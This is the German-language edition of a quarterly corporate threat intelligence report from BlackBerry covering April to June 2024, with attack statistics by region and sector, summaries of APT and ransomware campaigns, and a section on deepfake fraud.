Globaler Bedrohungsdatenbericht

Ausgabe September 2024

Berichtszeitraum: 1. April - 30. Juni 2024

Umsetzbare Intelligenz, die wichtig ist

Dieser Bericht bietet einen umfassenden Überblick über die globale Bedrohungslandschaft, wobei der Schwerpunkt auf der Bereitstellung von umsetzbaren Informationen liegt, die Kunden nutzen können, um ihre Unternehmen proaktiv zu schützen. Dieser Bericht deckt den Zeitraum von April bis Juni 2024 ab. Die Highlights des Berichts umfassen:

Unique Malware und gestoppte Angriffe (Angriffsversuche, die von BlackBerry® Cybersecurity-Lösungen abgewehrt wurden) sind im Vergleich zum vorherigen Berichtszeitraum um 53 % bzw. 18 % gestiegen. BlackBerry stellte fest, dass täglich durchschnittlich über 11.500 einzelne Malware-Hashes abgefangen wurden.

Weitere Informationen finden Sie unter Vierteljährliche Angriffe.

In diesem Quartal gab es über 800.000 Angriffe auf kritische Infrastrukturen, von denen 50 % auf den Finanzsektor gerichtet waren.

Entdecken Sie die internen und externen Erkenntnisse unseres Cyber Threat Intelligence (CTI)-Teams im Bereich Kritische Infrastrukturen.

Handelsunternehmen waren in diesem Zyklus stark betroffen, und von den gestoppten Angriffen richteten sich 66 % gegen Unternehmen, die Investitionsgüter liefern.

Mehr erfahren über diese Bedrohungen in dem Abschnitt über Handelsunternehmen.

Der neue Abschnitt "Law Enforcement Limelight" (Licht der Strafverfolgung) bringt mit den Ergebnissen des kanadischen National Cybercrime Coordination Centre (NC3) einen neuen Aspekt in diese Berichte ein.

Mehr erfahren über die Ransomware-Epidemie, die Kanada betrifft.

 

Viele hochkarätige kriminelle Gruppen (insbesondere Ransomware-Gruppen) waren im Berichtszeitraum sehr aktiv. Diese Gruppen verwenden eine Reihe komplexer Werkzeuge, um ihre Ziele zu erreichen.

Mehr erfahren unter Bedrohungsakteure und Werkzeuge.

Die Cyberbedrohungslandschaft ist ein Strudel von Gruppen, die die neuesten Schwachstellen ausnutzen und neue oder aktualisierte Malware-Familien einsetzen.

Lesen Sie den Abschnitt " Verbreitete Bedrohungen", um sich über aktuelle Bedrohungen für alle wichtigen Betriebssysteme zu informieren.

Bösartige Informationsdiebe (auch Infostealer genannt) sind eine bekannte Waffe, die von Bedrohungsakteuren eingesetzt wird, um wertvolle Informationen und Anmeldedaten zu exfiltrieren.

Lesen Sie unsere Beobachtungen zu Exfiltrationswerkzeugen im Abschnitt CylanceMDR Beobachtungen.

Unsere geopolitische Analyse befasst sich mit der Frage, inwiefern die Zunahme hochentwickelter Cyber-Bedrohungen die Notwendigkeit einer verbesserten Ausbildung im Bereich der Cybersicherheit unterstreicht.

Sehen Sie, wie BlackBerry in seinem ersten Cybersecurity Center of Excellence (CCoE) in Malaysia in die Cyberausbildung investiert.

Inhaltsübersicht

Der BlackBerry® Global Threat Intelligence Report wird in regelmäßigen Abständen veröffentlicht, um CISOs und andere wichtige Entscheidungsträger über die neuesten Cybersecurity-Bedrohungen und -Herausforderungen zu informieren, die ihre Branchen und geografischen Regionen betreffen. Im Jahr 2024 haben wir geopolitische Unruhen rund um den Globus zu einer Vielzahl von polarisierenden Themen erlebt. Dies hat böswillige Akteure und opportunistische Cyber-Bedrohungsgruppen auf den Plan gerufen, die den Aufruhr der Menschen ausnutzen, um Profit zu machen, Schaden anzurichten oder einfach nur das Chaos zu vergrößern. Um diese Bedrohungen zu bekämpfen, bietet BlackBerry wichtige Cybersicherheitsdienste für Organisationen aller Größen und in einer Vielzahl von Branchen auf der ganzen Welt.

Cyberangriffe insgesamt in diesem Zeitraum

Von April bis Juni 2024 wurden mit den Cybersecurity-Lösungen vonBlackBerry 3,7 Millionen Cyberangriffe abgewehrt. Das sind mehr als 43.500 abgewehrte Cyberangriffe pro Tag - ein Anstieg von 18 % gegenüber unserem vorherigen Berichtszeitraum von Januar bis März 2024.

Darüber hinaus beobachteten wir durchschnittlich 11.500 einzelne Malware-Samples pro Tag , die auf unseren Kundenstamm abzielten, ein Anstieg um 53 % gegenüber dem letzten Bericht. Dies ist einer der höchsten prozentualen Zuwächse gegenüber dem Vorquartal, seit wir unsere Global Threat Intelligence-Berichte erstellen. Während die Änderung eines binären Hashes oder die Generierung einzigartiger Nutzdaten für erfahrene Bedrohungsakteure nicht sehr komplex ist, ist das ungewöhnlich hohe Volumen an "gestoppten Angriffen" und "einzigartigen Hashes" von Bedeutung. Dies deutet darauf hin, dass Malware-Entwickler ihren Code schnell aktualisieren und anpassen, um die Widerstandsfähigkeit zu erhöhen. Die rohen Zahlen deuten darauf hin, dass sich neue Malware anpasst, bestehende Malware-Familien an Fähigkeiten gewinnen und Angreifer schnell fortschrittlichere Taktiken anwenden. Dies führt zu wirksamerer Malware durch verbesserte Verschleierung, Raffinesse und Umgehungstechniken.

BlackBerry überwacht und identifiziert aktiv Änderungen in Malware-Familien, da cyberkriminelle Entwickler versuchen, Cybersicherheitssysteme zu umgehen. In diesem Bericht finden Sie die neuesten Erkenntnisse unseres Threat Research and Intelligence Teams, erfahren, welche Gruppen derzeit die einzelnen Malware-Typen einsetzen, und erhalten unsere Empfehlungen für eine strategische Cyberabwehr gegen diese Arten von Bedrohungen.

Wie Sie feststellen werden, korreliert die Zahl der gesamten Angriffe nicht unbedingt mit der Zahl der einzigartigen Hashes (neue Malware). Wie die Abbildungen 2 bis 9 in den nächsten Abschnitten veranschaulichen, wird nicht bei jedem Cyberangriff einzigartige Malware verwendet. Dies hängt von der Motivation des Angreifers, der Komplexität des Angriffs und seinem übergeordneten Ziel ab - z. B. Spionage, finanzieller Gewinn oder allgemeiner Schaden für das Ziel.

Abbildung 1: Einzigartige Malware-Hashes, die pro Minute gefunden werden, März 2023 bis Juni 2024.
(*Dieser Bericht umfasst einen 120-Tage-Zyklus. Die anderen Berichte beziehen sich auf einen Zyklus von etwa 90 Tagen).

Cyberangriffe insgesamt nach Land

Angriffe gestoppt

Die meisten Angriffsversuche wurden in diesem Zyklus auf Organisationen in den USA verübt, die BlackBerry -Lösungen einsetzen. Außerhalb der USA gab es auch in Südkorea, Japan, Australien und Neuseeland eine hohe Anzahl von Angriffen, was ihnen einen Platz unter den Top Five einbrachte und den asiatisch-pazifischen Raum (APAC) zur zweitstärksten Zielregion machte.

In der APAC-Region, in der sich BlackBerry zunehmend engagiert, beeinflussen geopolitische Spannungen weiterhin die Cyber-Trends. Staatlich und nicht staatlich geförderte Cyberangriffe auf kritische Infrastrukturen, Lieferketten und Unternehmen nehmen zu. Unternehmen sind zunehmend Ziel einer Vielzahl von Bedrohungen wie Cyberspionage, Lauschangriffen, Ransomware und Phishing-Angriffen. Um die Widerstandsfähigkeit ihrer Lieferketten und Unternehmen zu verbessern, sollten sie Vorsicht walten lassen und ihre Wachsamkeit erhöhen, um ihre Infrastruktur, Daten, Geräte und Kommunikation zu schützen.

Abbildung 2 zeigt die fünf Länder, in denen die Cybersecurity-Lösungen von BlackBerry die meisten Cyberangriffe abgewehrt haben und die die meisten bösartigen Binärdateien erhalten haben.

Abbildung 2: Nationen, geordnet nach der Anzahl der gestoppten Angriffe und der Anzahl der eindeutigen Hashes, von April bis Juni 2024.

Einzigartige Malware

Wie im Abschnitt "Gesamtzahl der Cyberangriffe in diesem Zeitraum" erwähnt, beobachtete BlackBerry durchschnittlich 11.500 neue Hashes (einzigartige Malware) pro Tag, die auf unseren Kundenstamm abzielten, ein Anstieg um 53 % gegenüber dem vorherigen Bericht. Dies ist einer der höchsten prozentualen Zuwächse im Vergleich zum Vorquartal, die wir seit Beginn unserer regelmäßigen Berichte beobachtet haben. Viele Faktoren tragen zu diesem Anstieg der einzelnen Schadprogramme bei. Einer davon ist die Zunahme gezielter Angriffe auf Makroebene - wie z. B. die gezielte Ansprache einer gesamten Mitarbeiter-E-Mail-Liste mit gezielten Phishing-E-Mails und unternehmensspezifischen Ködern - in der Hoffnung, dass mehrere Mitarbeiter getäuscht werden.

Wie Abbildung 2 zeigt, stehen die USA, Japan, Südkorea und Australien wie schon im letzten Bericht an der Spitze der Liste. Wie Abbildung 2 zeigt, stehen die USA, Japan, Südkorea und Australien weiterhin an der Spitze der Liste, wie auch schon im letzten Bericht. Darüber hinaus ist Kanada nun der fünftgrößte Empfänger von Unique Malware.

Vergleich der Ergebnisse

Wie der Vergleich der Ergebnisse dieses Zeitraums mit dem letzten Bericht zeigt, sind die vier führenden Länder sowohl bei den abgewehrten Angriffen als auch bei den entdeckten Malware-Hashes relativ unverändert geblieben. Allerdings hat Japan seine APAC-Nachbarn in Bezug auf die Anzahl bösartiger Hashes überholt, die unsere Kunden in diesem Land entdeckt haben. Neuseeland verzeichnete das fünftgrößte Angriffsvolumen, und Kanada überholte Brasilien und schaffte es damit in die Liste der fünf Länder, die am häufigsten mit eindeutigen Hashes angegriffen wurden (siehe Abbildung 2): Die USA, Japan, Südkorea und Australien führen die Liste nach wie vor an. Wie Abbildung 2 zeigt, stehen die USA, Japan, Südkorea und Australien nach wie vor an der Spitze der Liste, wie auch schon im letzten Bericht. Darüber hinaus ist Kanada nun der fünftgrößte Empfänger von Unique Malware.
Abbildung 3: Veränderung der Rangfolge der insgesamt gestoppten Angriffe und der eindeutigen Hashes in diesem Bericht (April - Juni 2024) im Vergleich zum vorherigen Bericht (Januar - März 2024).

Cyber Story Highlight: Spionage in APAC

Transparent Tribe zielt auf den indischen Regierungs-, Verteidigungs- und Luftfahrtsektor ab und nutzt plattformübergreifende Programmiersprachen

In ihren jüngsten Bemühungen identifizierten die Forscher von BlackBerry Transparent Tribe, eine pakistanische APT-Gruppe (Advanced Persistent Threat), die es auf die indische Regierung, den Verteidigungs- und den Luftfahrtsektor abgesehen hat. Die Gruppe, die seit 2013 für ihre Cyberspionageaktivitäten bekannt ist, verwendet plattformübergreifende Sprachen wie Python und Golang und missbraucht Webdienste wie Telegram und Discord. Zu den jüngsten Kampagnen gehörten Spearphishing-E-Mails, die auf wichtige Akteure der Luft- und Raumfahrt in Bengaluru (früher Bangalore), Indien, abzielten. Trotz der Versuche, ihre Herkunft zu verbergen, wiesen die Taktiken und Werkzeuge von Transparent Tribe auf sie zurück. 

Cyberangriffe nach Branchen

BlackBerry hat seine Industriesektoren in zwei Hauptkategorien zusammengefasst: kritische Infrastrukturen und Wirtschaftsunternehmen. BlackBerryDie Telemetriedaten und -statistiken des Unternehmens zu kritischen Infrastrukturen stammen von seinen Kunden aus den 16 Sektoren, die von der Cybersecurity and Infrastructure Security Agency (CISA ) als kritische Infrastrukturen definiert wurden. Zu diesen Sektoren gehören Gesundheitswesen, Behörden, Energie, Landwirtschaft, Finanzen und Verteidigung. Geschäftseinheiten innerhalb von Handelsunternehmen beschäftigen sich mit der Produktion, dem Vertrieb oder dem Verkauf von Waren und Dienstleistungen. Diese Unternehmen sind in verschiedenen Sektoren wie Fertigung, Einzelhandel und Dienstleistungen tätig.

Abbildung 4: Gestoppte branchenspezifische Angriffe und eindeutige Hashes von April bis Juni 2024.

Kritische Infrastrukturen

Kritische Infrastrukturen sind ein lukratives Ziel für Cyber-Kriminelle. Diese Daten sind oft sehr wertvoll und können an andere Bedrohungsgruppen weiterverkauft, für die Planung von Angriffen oder sogar für Spionage verwendet werden. Bedrohungsakteure, die es auf kritische Infrastrukturen abgesehen haben, greifen bei ihren Angriffen möglicherweise auf Ransomware zurück, da die Organisation lieber das Lösegeld zahlt, als sich Zeit für die Wiederherstellung aus Backups zu nehmen. Für Organisationen, die kritische Dienstleistungen erbringen, wie z. B. das Gesundheitswesen, ist Zeit von entscheidender Bedeutung, und die Bedrohungsakteure wissen dies sehr wohl.

In diesem Jahr haben die geopolitischen Turbulenzen kritische Infrastrukturen in das Fadenkreuz von Gegnern gerückt, die gegen die Politik der Länder sind, in denen sie sich befinden oder mit denen sie zusammenarbeiten. Dies veranlasst Bedrohungsgruppen und staatliche Sponsoren häufig dazu, gezielt kritische Infrastrukturen ins Visier zu nehmen.

Die zunehmende Digitalisierung der kritischen Infrastrukturen hat den Sektor in den letzten Jahren noch anfälliger für Cyberkriminelle gemacht. Bedrohungsakteure nutzen kritische Systeme aktiv aus, indem sie Schwachstellen wie Systemfehlkonfigurationen und ungepatchte Altsysteme angreifen oder versuchen, über Social-Engineering-Kampagnen, die sich gegen Mitarbeiter richten, in Systeme einzudringen.

Im Zeitraum von April bis Juni 2024, CylanceENDPOINT™ und andere Cybersecurity-Lösungen von BlackBerry über 800.000 Angriffe auf Organisationen in den kritischen Infrastrukturbranchen abgewehrt . Fast die Hälfte dieser Angriffe richtete sich gegen Unternehmen des Finanzsektors - ein Anstieg um 10 % im Vergleich zum letzten Zeitraum -, während Organisationen des Regierungs- und öffentlichen Sektors die größte Vielfalt an Angriffen erlebten und über 45 % der eindeutigen Hashes auf sich zogen.

Darüber hinaus richtete sich fast die Hälfte (49 %) der eindeutigen Malware-Hashes gegen Organisationen mit kritischen Infrastrukturen, ein Anstieg von 17 % im Vergleich zum vorherigen Zeitraum, während 41 % der branchenspezifischen Cyberangriffe, auf die BlackBerry Cybersecurity-Lösungen gestoßen sind, gegen kritische Infrastrukturen gerichtet waren.

Abbildung 5: Gestoppte Angriffe auf kritische Infrastrukturen und einzigartige Malware nach Sektor, April bis Juni 2024.
Abbildung 6: Die wichtigsten internen Bedrohungen für kritische Infrastrukturen in diesem Quartal.

Cyber Story Highlight: Bedrohungen für kritische Infrastrukturen

SideWinder nutzt die neue Vertriebsinfrastruktur, um Häfen und maritime Einrichtungen im Mittelmeer zu erreichen

Im Juli 2024 entdeckte das BlackBerry Threat Research and Intelligence Team eine neue Kampagne der als SideWinder bekannten Bedrohungsgruppe. Die SideWinder-Gruppe, die auch als Razor Tiger, Rattlesnake und T-APT-04 bekannt ist, ist seit mindestens 2012 aktiv. Die Gruppe wurde bereits dabei beobachtet, wie sie es auf militärische, staatliche und geschäftliche Einrichtungen abgesehen hatte, mit besonderem Schwerpunkt auf Pakistan, Afghanistan, China und Nepal. SideWinder nutzt in der Regel Spearphishing per E-Mail, die Ausnutzung von Dokumenten und DLL-Sideloading-Techniken, um eine Entdeckung zu vermeiden und gezielte Implantate zu liefern.

Bei dieser Kampagne beobachtete BlackBerry drei gefälschte "visuelle Köder"-Dokumente, die mit einer ganz bestimmten Hafeninfrastruktur verbunden waren. Visuelle Köder sind in der Regel an sich nicht bösartig; ihr Hauptzweck besteht darin, das Opfer davon abzulenken, dass es merkt, dass es kompromittiert wurde. Bei dem Opfer handelt es sich in der Regel um einen Mitarbeiter des Zielunternehmens. Unten sehen Sie ein Beispiel aus der jüngsten Kampagne von SideWinder:

Abbildung 7: Visuelles Köderdokument, das SideWinder in seiner jüngsten Kampagne verwendet hat.
Abbildung 7: Visuelles Köderdokument, das SideWinder in seiner jüngsten Kampagne verwendet hat.

Bedrohungsakteure verwenden eine Vielzahl von Tricks, um das Opfer dazu zu verleiten, das visuelle Köderdokument zu öffnen und zu lesen:

  • Der Angreifer kopiert das echte Logo einer legitimen Organisation, die dem Empfänger aufgrund seines Berufs oder seiner Branche bekannt sein dürfte. In Abbildung 7 oben missbraucht das visuelle Köderdokument das Logo der (legitimen) Red Sea Ports Authority in Ägypten.
  • Die Überschriften von Dokumenten sind so gestaltet, dass sie beim Empfänger maximale Angst auslösen. Die Überschrift in unserem obigen Beispiel ("KÜNDIGUNG UND GEHALTSKÜNDIGUNG DES ARBEITNEHMERS") soll den Arbeitnehmer um die Sicherheit seines Arbeitsplatzes und seiner Finanzen fürchten lassen.
  • Achten Sie im obigen Beispiel auf emotional aufgeladene Formulierungen wie "den größten Teil unserer finanziellen Reserven aufgebraucht", "ernsthafte Bedenken" und "das Arbeitsverhältnis beenden" im Text des Dokuments. Diese Formulierungen sind fett formatiert, damit sie dem Leser sofort ins Auge fallen.

Bedrohungsakteure hoffen, dass das Opfer durch die Verwendung vertrauter Firmenlogos und das Hervorrufen starker Emotionen wie Angst oder Sorge um die Sicherheit des Arbeitsplatzes glaubt, dass das Dokument legitim ist und gezwungen ist, es in einem Zustand großer Angst zu lesen. Sie sind dann so abgelenkt, dass sie seltsame Vorgänge auf ihrem Gerät nicht bemerken, wie z. B. System-Popups oder erhöhte Lüftergeräusche, die durch eine hohe CPU-Auslastung verursacht werden, was oft ein frühes Warnzeichen für eine laufende Malware-Infektion ist.

Aus der Analyse der Daten, die wir bei unseren Nachforschungen entdeckt haben, schließen wir mit mittlerer Sicherheit, dass die neue Kampagne von SideWinder auf Häfen und maritime Einrichtungen im Indischen Ozean und im Mittelmeer abzielt. Aufgrund der früheren Kampagnen von SideWinder glauben wir, dass das Ziel dieser neuen Kampagne Spionage und das Sammeln von Informationen ist. Lesen Sie die ganze Geschichte im BlackBerry Blog.

Kritische Infrastrukturen: Externe Bedrohungen

BlackBerry verfolgt auch genau die externen Bedrohungen, d. h. die von externen Organisationen gemeldeten Bedrohungen, die nicht notwendigerweise in den eigenen Mietobjekten von BlackBerryzu finden sind. Während dieses Zeitraums meldeten externe Gruppen - Regierungsbehörden, Wirtschaftsnachrichtenorganisationen und andere - zahlreiche Angriffe auf kritische Infrastrukturen in der ganzen Welt.

In den letzten Märztagen wurde bekannt, dass verschiedene indische Regierungsbehörden und Einrichtungen des Energiesektors mit einer angepassten Variante des frei verfügbaren Infostealers HackBrowserData infiziert wurden. Unter Verwendung von Phishing-E-Mails als Infektionsvektor und Slack-Kanälen als Exfiltrationskanal stahl der unbekannte Bedrohungsakteur 8,8 GB an sensiblen Daten, darunter Mitarbeiterdaten und Finanzdaten.

Im April meldete das texanische Telekommunikationsunternehmen Frontier Communications der US-Börsenaufsichtsbehörde (SEC), dass es am 14. April eine Sicherheitslücke entdeckt hatte und einige seiner Systeme abschalten musste, um sie wiederherzustellen. Der unbekannte Angreifer war in der Lage, auf sensible Daten, einschließlich personenbezogener Daten, zuzugreifen.

Ebenfalls im April meldete das ukrainische Computer Emergency Response Team (CERT-UA) einen Plan der mutmaßlich von Russland unterstützten Gruppe Sandworm, verschiedene kritische Infrastruktureinrichtungen in dem vom Krieg gezeichneten Land anzugreifen. Ziel des Plans waren etwa 20 Einrichtungen in verschiedenen kritischen Infrastrukturbereichen, darunter Wasser und Energie. Sandworms langjährige Angriffe auf die kritische Infrastruktur der Ukraine werden wahrscheinlich weitergehen, da der Krieg zwischen Russland und der Ukraine weitergeht.

In der ersten Maiwoche veröffentlichten mehrere US-Behörden in Zusammenarbeit mit dem Nationalen Cyber-Sicherheitszentrum des Vereinigten Königreichs und dem kanadischen Zentrum für Cybersicherheit (CCCS) einen gemeinsamen Hinweis auf eine anhaltende Bedrohung durch pro-russische Hacktivisten. Die Hacktivisten hatten es auf mit dem Internet verbundene kritische Infrastrukturen abgesehen, darunter Wasser, Energie, Dämme und Landwirtschaft. Ihre Bemühungen konzentrierten sich auf mit dem Internet verbundene Systeme der Betriebstechnologie (OT) in kritischen Infrastrukturbereichen in Europa und Nordamerika.

Anfang Mai hatten die Betreiber der Ransomware BlackBasta einen großen gemeinnützigen katholischen Gesundheitsdienstleister mit etwa 140 Krankenhäusern in 18 US-Bundesstaaten im Visier. Der Angriff unterbrach die Dienste im gesamten Netzwerk des Gesundheitsdienstleisters für mehrere Wochen. Anfang Juni stahl BlackBasta dann 550 GB an Daten des Biotechnologieunternehmens Elutia in Maryland. Zu den Daten gehörten Mitarbeiter- und Finanzinformationen.

BlackBasta war nicht die einzige Ransomware-Bande, die es auf das Gesundheitswesen abgesehen hatte. Ende Juni drang die Ransomware-Gruppe BlackSuit in den südafrikanischen National Health Laboratory Service (NHLS) und seine 265 Labore ein. Es wird vermutet, dass BlackSuit ein Abkömmling der aggressiven und gefährlichen Conti-Ransomware-Gang ist. Der BlackSuit-Einbruch fiel mit einem Ausbruch von Affenpocken (mpox) zusammen und hatte erhebliche Auswirkungen auf die Systeme des NHLS. Der Bedrohungsakteur löschte Teile der NHLS-Systeme, einschließlich Backups, obwohl keine sensiblen Patientendaten verloren gingen.

Diese und andere Angriffe im letzten Quartal zeigen, dass Ransomware-Betreiber, die es auf kritische Infrastrukturen, insbesondere den Gesundheitssektor, abgesehen haben, ein anhaltendes Problem darstellen.

Kommerzielles Unternehmen

Auch die internen Bedrohungen gegen Wirtschaftsunternehmen haben in diesem Berichtszeitraum deutlich zugenommen. Die Zahl der durch BlackBerry abgewehrten Angriffe (1,1 Millionen Angriffe) stieg im Vergleich zum letzten Bericht um 60 %.

Innerhalb des Wirtschaftssektors wurde eine deutliche Zunahme der Angriffe auf den Investitionsgütersektor beobachtet. Im Gegensatz zu Konsumgütern gehören zu den Investitionsgütern Maschinen, Werkzeuge und Ausrüstungen, die für verschiedene Branchen in Unternehmen und kritischen Infrastrukturen unerlässlich sind. Ein Angriff auf diese Güter kann sich auf die digitalen und physischen Lieferketten eines Unternehmens auswirken.

Abbildung 8: Gestoppte Angriffe und eindeutige Malware im Zusammenhang mit gewerblichen Unternehmen nach Branchen von April bis Juni 2024.
Abbildung 9: Wichtigste interne Bedrohungen für Wirtschaftsunternehmen von April bis Juni 2024.

Handelsunternehmen: Externe Bedrohungen

Anfang April wurde IxMetro PowerHost Opfer eines Cyberangriffs durch die relativ neue SEXi-Ransomware-Bande, die angeblich durchgesickerten LockBit 3.0-Quellcode verwendete. Die Gruppe zielte auf die VMware ESXi-Server und Backups des Unternehmens ab und verursachte eine erhebliche Unterbrechung der Dienste von IxMetro PowerHost in Chile.

Ebenfalls im April wurde die chinesische Shopping-Plattform Pandabuy angegriffen und die Daten von mehr als 1,3 Millionen Kunden wurden online veröffentlicht. Pandabuy ermöglicht es den Nutzern, Produkte von anderen chinesischen E-Commerce-Plattformen zu kaufen. Ein als Sanggiero bekannter Bedrohungsakteur erklärte sich für den Angriff verantwortlich und gab an, kritische Serverschwachstellen in der API der Plattform und andere Schwachstellen ausgenutzt zu haben, um Zugang zu den internen Diensten des Einzelhändlers zu erhalten. Es wird vermutet, dass der E-Commerce-Händler zunächst eine Forderung gezahlt hat, um ein Datenleck zu verhindern. Im Juni 2024 behauptete jedoch derselbe Bedrohungsakteur, die in China ansässige Plattform erneut ausgenutzt und erpresst zu haben.

Anfang Mai informierte ein großes multinationales Technologieunternehmen seine Kunden über eine groß angelegte Datenschutzverletzung, von der fast 50 Millionen Personen betroffen waren. Das Technologieunternehmen bestätigte zwar, dass keine Finanzdaten gefährdet waren, aber andere personenbezogene Daten (PII) wurden offengelegt, darunter Namen und Adressen von Kunden. Dennoch hat das Technologieunternehmen die möglichen Auswirkungen der Sicherheitsverletzung öffentlich heruntergespielt, da es sich bei den gestohlenen Daten nicht um Finanzdaten handelt.

Eine der bisher größten Datenschutzverletzungen in diesem Jahr ereignete sich im Mai, als die Bedrohungsgruppe ShinyHunters in ein multinationales Unternehmen für den Verkauf und Vertrieb von Eintrittskarten für die Unterhaltungsbranche eindrang und die Daten von über 560 Millionen Kunden stahl. Zu den Daten gehörten personenbezogene Daten wie Namen, Adressen und E-Mails sowie gehashte Kreditkartendaten. Die betroffenen Nutzer wurden inzwischen per Post benachrichtigt.

Im Juni kam es bei einem amerikanischen multinationalen Softwareunternehmen aufgrund eines Ransomware-Angriffs zu einem großflächigen Ausfall , der die Abläufe in Tausenden von nordamerikanischen Autohäusern beeinträchtigte. Die Unterbrechung betraf alle Bereiche der Aktivitäten der Händler, einschließlich Autoverkauf und Reparaturen, an mehr als 15 000 Standorten. Die Ransomware-Gruppe BlackSuit übernahm die Verantwortung für den Angriff und forderte fast 25 Millionen US-Dollar in Kryptowährung als Lösegeld. Es wird behauptet, dass die Organisation das Lösegeld gezahlt hat, um ihre Systeme wiederherzustellen.

Ende Juni bestätigte das nordamerikanische Softwareunternehmen TeamViewer, dass die weit verbreitete APT-Gruppe Cozy Bear (auch bekannt als APT29) die IT-Systeme des Unternehmens angegriffen hat. Cozy Bear ist eine in Russland ansässige Hackergruppe, die angeblich mit dem russischen Auslandsgeheimdienst verbunden ist. Die Gruppe hat im Laufe der Jahre mehrere Angriffe und Exploits durchgeführt, darunter auch den SolarWinds-Angriff im Jahr 2020. TeamViewer gab eine Erklärung ab, in der es heißt, dass nur die Daten von Mitarbeiterkonten kompromittiert wurden und dass es keine Beweise dafür gibt, dass Cozy Bear auf Produktionsumgebungen oder Kundendaten zugegriffen hat.

Cyber Story Highlight: Deepfakes gegen kommerzielle Unternehmen

Wachsamkeit der Mitarbeiter: Die erste Verteidigungslinie gegen Deepfake-Betrug

Gefälschte Fotos, Videos und "Deep-Voice"-Audio werden zu einem zunehmenden Problem im Bereich der Cybersicherheit. Deepfakes sind digital manipulierte Medien, die mit Hilfe generativer künstlicher Intelligenz (KI) erstellt werden, wobei der häufigste Anwendungsfall ein "Faceswap" ist - das digitale Übereinanderlegen des Gesichts einer Person auf eine andere. Deepfake-Medien sind oft sehr realistisch und überzeugend und können von böswilligen Akteuren für eine Vielzahl von Angriffen eingesetzt werden, darunter Phishing-Betrug, gefälschte Telefonanrufe und sogar gefälschte Videoanrufe, die dem Empfänger vorgaukeln sollen, er erhalte eine legitime Anfrage von einem anderen Mitarbeiter, beispielsweise seinem Chef.

Seit die erste App zur Erstellung von Deepfakes Ende 2017 von einem Reddit-Nutzer gestartet wurde, haben sich Deepfakes in rasantem Tempo weiterentwickelt und sind erschreckend effektiv, wenn es darum geht, Mitarbeiter dazu zu bringen, Angreifern Anmeldedaten, Finanz- oder Kundendaten zu übermitteln und sogar Millionen von Dollar an einen Betrüger zu überweisen.

Vor kurzem ist der Automobilhersteller Ferrari einem kostspieligen Betrug entgangen. Ein leitender Angestellter erhielt einen verdächtigen Anruf von jemandem, der vorgab, der CEO Benedetto Vigna zu sein. Der Akzent und der Tonfall des Betrügers waren fast identisch mit dem des echten CEOs, aber der Manager bemerkte rote Fahnen wie die Verwendung einer unbekannten Telefonnummer und die angebliche Dringlichkeit der Nachrichten.

Um die Identität des Anrufers zu überprüfen, stellte die Führungskraft eine konkrete Frage zu einer Buchempfehlung - ein Detail, das nur der echte CEO kennen würde. Als der Betrüger nicht antworten konnte, legten sie auf. Die schnelle Reaktion des Geschäftsführers verhinderte eine mögliche Katastrophe und veranlasste Ferrari, eine interne Untersuchung einzuleiten, um die Sicherheit der Kommunikation zu gewährleisten.

Dieser Vorfall verdeutlicht die wichtige Rolle, die Mitarbeiter beim Schutz ihrer Unternehmen vor Betrug spielen. Ein entscheidender Bestandteil fast aller Deepfake-Angriffe ist das Social Engineering. Der Bedrohungsakteur geht davon aus, dass der Mitarbeiter das schwächste Glied im Sicherheitsgefüge eines Unternehmens ist, und nutzt psychologische Manipulationstechniken, um das Vertrauen der Zielperson zu gewinnen. Hut ab vor Mitarbeitern, die wachsam und skeptisch gegenüber ungewöhnlichen Anfragen sind, insbesondere wenn es um die Übertragung von Geld oder sensiblen Informationen geht. Ihre Aufmerksamkeit und ihr schnelles Handeln können ein Unternehmen vor erheblichen finanziellen Verlusten und Rufschädigung bewahren. 

Unternehmen können ihre Sicherheit verbessern, indem sie ihre Mitarbeiter über die Warnzeichen aufklären, die darauf hinweisen, dass ein Betrüger hinter einem "gefälschten" Telefon-/Videoanruf, einer E-Mail oder einer SMS stecken könnte. Sie können damit beginnen, diese unbesungenen Helden zu feiern und zu unterstützen, die Ihr Unternehmen jeden Tag vor raffinierten Bedrohungen schützen. Teilen Sie diese Anekdote mit Ihren Kollegen und Mitarbeitern. Erinnern Sie sie daran, dass sie, wenn sie den Verdacht haben, dass etwas nicht stimmt, ihrem Instinkt vertrauen und einen zweiten Weg finden sollten, um die Identität des Antragstellers zu überprüfen.

Um mehr über Deepfakes zu erfahren, lesen Sie unseren Whitepaper, Deepfakes Entlarvt: Die Technologie und Techniken hinter dieser wachsenden Bedrohung.

Geopolitische Analyse und Kommentare

Regierungen auf der ganzen Welt sind sich zunehmend darüber im Klaren, dass Technologie eine treibende Kraft in geopolitischen Rivalitäten ist. In seiner Rede auf der RSA-Konferenz in San Francisco, Kalifornien, am 6. Mai 2024 beschrieb US-Außenminister Antony J. Blinken eine Welt an der Schwelle zu einem Nullsummen-Wettbewerb, in dem die Länder gezwungen wären, westliche oder chinesische Technologien zu übernehmen. Blinkens Botschafter für Cyberspace und digitale Politik, Nathaniel C. Fick, drückte es noch deutlicher aus, als er sagte: "Die internationale Ordnung wird dadurch definiert werden, wessen metaphorisches Betriebssystem dominiert."

Das beispiellose Tempo, mit dem sich Technologien wie die generative KI entwickeln, hat zu einer Vielzahl von Aktivitäten geführt, die einen "verantwortungsvollen" Umgang mit fortschrittlichen digitalen Technologien fordern. Technologien wie KI haben zwar ein beträchtliches Potenzial, das Wirtschaftswachstum voranzutreiben, die Gesellschaft zu verändern und einige der schwierigsten Probleme der Welt zu lösen (z. B. Klimawandel, Ungleichheit und Krankheiten), doch sie bergen auch Risiken, die große Auswirkungen haben können, vor allem, wenn sich diese Risiken in kritischen Infrastrukturen oder Dienstleistungen manifestieren, auf die die Menschen jeden Tag angewiesen sind.

Wie in diesem Bericht hervorgehoben wird, haben es Cyberkriminelle - einschließlich staatlich geförderter Gruppen - zunehmend auf kritische Infrastrukturen abgesehen. Die Zahl der Vorfälle, bei denen in böswilliger oder krimineller Absicht Dienste unterbrochen oder Betreiber und Eigentümer kritischer Infrastrukturen zur Zahlung von Lösegeld gezwungen wurden, ist in den letzten Jahren weltweit sprunghaft angestiegen. In diesem Berichtszeitraum dokumentierte BlackBerry mehr als 800.000 Angriffe auf kritische Infrastrukturen, von denen sich 50 % gegen den Finanzsektor richteten. Die Täter sind sich der Kritikalität dieser Dienste bewusst und versuchen, ihre Bemühungen, Lösegeld zu erpressen, zu maximieren, indem sie versuchen, diese Dienste so weit wie möglich zu stören oder damit zu drohen.

